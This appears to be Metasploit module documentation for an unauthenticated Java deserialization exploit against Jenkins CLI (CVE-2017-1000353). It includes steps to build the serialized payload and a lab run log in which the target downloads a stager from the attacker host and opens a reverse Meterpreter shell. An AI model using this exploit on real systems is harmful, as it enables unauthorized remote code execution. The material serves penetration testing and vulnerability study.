## Vulnerable Application

  An unauthenticated Java object deserialization vulnerability exists
  in the CLI component for Jenkins versions below `v2.54`.

  The `readFrom` method within the `Command` class in the Jenkins
  CLI remoting component deserializes objects received from clients without
  first checking / sanitizing the data. Because of this, a malicious serialized
  object contained within a serialized `SignedObject` can be sent to the Jenkins
  endpoint to achieve code execution on the target.

### Installation

  Vulnerable versions of Jenkins can be downloaded from [here](https://get.jenkins.io/war-stable/).
  Additionally, a [jdk](https://www.oracle.com/java/technologies/javase-jdk8-downloads.html) will need to be installed on the target system.

  To start Jenkins, navigate to the location of the downloaded `war` file and execute:
  `java -jar <jenkins-file>.war`. To test if Jenkins is properly working, the CLI component
  can be accessed by navigating to `http://localhost:8080/cli`.

### How to Produce Binary Blob from PoC

  Generating the serialized object first requires the `Payload.java` file
  located in the `data/exploits/CVE-2017-1000353/` folder.

  1. Obtain a vulnerable version of Jenkins
     `wget https://get.jenkins.io/war-stable/<version>/jenkins.war`
  2. Create a folder to extract the Jenkins files into
     `mkdir libs/`
  3. Extract the contents of the war file into the newly created folder
     `cd libs/ && jar -xf ../jenkins.war`
  4. Assuming the `Payload.java` file is located in the same location as `jenkins.war`,
     compile the file, ensuring the Jenkins libraries are in the classpath
     `cd ../ && javac -cp ".:./libs/WEB-INF/lib/*" Payload.java`
  5. To execute, supply the name of the outfile for the serialized object
     and a placeholder command (Note. the command gets patched in the exploit module)
     `java -cp ".:./libs/WEB-INF/lib/*" Payload serial_obj.ser 'touch /tmp/test'`
  6. The serialized object will be located in the outfile you supplied in the
     previous step

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use exploit/linux/http/jenkins_cli_deserialization`
  4. Do: `set RHOST <ip>`
  5. Do: `run`
  6. You should get a shell.

## Options

  No options

## Scenarios
### Jenkins `v2.32.1` on Ubuntu Linux 18.04.1`

```
msf6 > use exploit/linux/http/jenkins_cli_deserialization
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/jenkins_cli_deserialization) > set rhost 192.168.37.149
rhost => 192.168.37.149
msf6 exploit(linux/http/jenkins_cli_deserialization) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(linux/http/jenkins_cli_deserialization) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Jenkins version 2.32.1 detected
[*] Sending payload...
[*] Using URL: http://0.0.0.0:8080/JMpXWoK
[*] Local IP: http://192.168.1.141:8080/JMpXWoK
[*] Client 192.168.37.149 (curl/7.58.0) requested /JMpXWoK
[*] Sending payload to 192.168.37.149 (curl/7.58.0)
[*] Command Stager progress -  50.46% done (55/109 bytes)
[*] Command Stager progress -  70.64% done (77/109 bytes)
[*] Command Stager progress -  82.57% done (90/109 bytes)
[*] Command Stager progress - 100.00% done (109/109 bytes)
[*] Sending stage (976712 bytes) to 192.168.37.149
[*] Meterpreter session 7 opened (192.168.37.1:4444 -> 192.168.37.149:44748) at 2020-09-10 18:01:34 -0500
[*] Server stopped.

meterpreter > getuid
Server username: space @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.37.149
OS           : Ubuntu 18.04 (Linux 5.4.0-42-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```
